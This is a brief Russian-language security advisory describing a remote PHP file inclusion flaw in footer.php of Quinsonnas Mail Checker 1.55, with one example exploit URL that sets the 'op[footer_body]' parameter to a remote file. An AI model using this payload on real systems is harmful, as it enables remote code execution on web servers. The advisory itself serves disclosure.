Программа: Quinsonnas Mail Checker 1.55

Уязвимость позволяет удаленному пользователю выполнить произвольный PHP сценарий на целевой системе. Уязвимость существует из-за недостаточной обработки входных данных в параметре «op[footer_body]» сценарием footer.php. Удаленный пользователь может выполнить произвольный PHP сценарий на целевой системе с привилегиями Web сервера.

Пример:

/quinsonnas-1.55/footer.php?op[footer_body]=http://localhost/020.txt?



Оставить мнение